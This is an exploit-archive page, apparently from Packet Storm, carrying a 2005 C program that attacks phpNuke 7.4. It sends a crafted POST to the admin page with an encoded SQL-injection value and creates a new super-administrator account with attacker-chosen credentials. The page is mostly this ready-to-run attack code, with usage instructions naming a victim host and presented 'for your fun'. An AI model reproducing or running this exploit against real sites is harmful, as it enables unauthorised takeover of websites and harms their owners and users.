what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

silePNUKExpl_v7.4.c

silePNUKExpl_v7.4.c
Posted Feb 25, 2005
Authored by Silentium | Site autistici.org

phpNUKE version 7.4 remote exploit that adds an administrative user.

tags | exploit, remote
SHA-256 | 86151974f860e2902a16b8cb3ca111c827b9c3fed0f5bf33e2ab3c7274a2abad

silePNUKExpl_v7.4.c

Change Mirror Download
Hi, I'm Silentium of the Anacron Group Italy,,.
I have write an exploit for phpNuke v7.4
this exploit add an admin user on cms..(old vuln)..

AUTHOR: Silentium
GROUP: Anacron Group Italy
SITE: http://www.autistici.org/anacron-group-italy
LINK: http://www.autistici.org/anacron-group-italy/file/source/silePNUKExpl_v7.4.c

For contact me:
anacrongroupitaly[at]autistici[dot]org


/****************************************************
* *
* phpNUKE v7.4 exploit *
* *
* this exploit create new admin with relative *
* passwd that you specified on parameter of exploit *
* you take administrative control of the webPortal *
* *
* Reverences: http://www.osvdb.org/9563 *
* *
* coded by: Silentium of Anacron Group Italy *
* date: 07/02/2005 *
* e-mail: anacrongroupitaly[at]autistici[dot]org *
* my_home: www.autistici.org/anacron.group-italy *
* *
* this tool is developed under GPL license *
* no(c) .:. copyleft *
* *
****************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80 // port of web server

void info(void);
void sendxpl(FILE *out, char *argv[]);
void errsock(void);
void errgeth(void);
void errconn(char *argv[]);

int main(int argc, char *argv[]){

FILE *out;
int sock, sockconn;
struct sockaddr_in addr;
struct hostent *hp;

if(argc!=5)
info();

if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
errsock();

system("clear");
printf("[*] Creating socket [OK]\n");

if((hp = gethostbyname(argv[1])) == NULL)
errgeth();

printf("[*] Resolving victim host [OK]\n");

memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);

sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
errconn(argv);

printf("[*] Connecting at victim host [OK]\n");

out = fdopen(sock,"a");
setbuf(out,NULL);

sendxpl(out,argv);

printf("[*] Now check your username and password\n"
" on http://%s%s\n\n",argv[1],argv[2]);

shutdown(sockconn,2);
close(sockconn);

return 0;

}


void info(void){

system("clear");
printf("#########################################\n"
"# phpNUKE v7.4 exploit #\n"
"#########################################\n"
"# this exploit create an admin with #\n"
"# the relative password, for your fun. #\n"
"# exploit coded by Silentium #\n"
"# Anacron Group Italy #\n"
"# www.autistici.org/anacron-group-italy #\n"
"#########################################\n\n"
"[Use]\n\n"
" silePNUKExpl <victim_host> <path_adminpage> <username> <password>\n\n"
"[example]\n\n"
" silePNUKExpl www.victim.com /admin.php sile silePass\n\n");
exit(1);

}


void sendxpl(FILE *out, char *argv[]){

int size = 145;

size+=sizeof(argv[3]);
size+=sizeof(argv[4]);

fprintf(out,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"add_aid=%s&add_name=morte&add_pwd=%s&add_email=email%%40mail.com&admin="
"eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAuthor&Submit="
"Create+Admin\n\n",argv[2],argv[1],size,argv[3],argv[4]);

printf("[*] Sending exploit [OK]\n\n");

}


void errsock(void){

system("clear");
printf("[x] Creating socket [FAILED]\n\n");
exit(1);

}


void errgeth(void){

printf("[x] Resolving victim host [FAILED]\n\n");
exit(1);

}


void errconn(char *argv[]){

printf("[x] Connecting at victim host [FAILED]\n\n",argv[1]);
exit(1);

}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close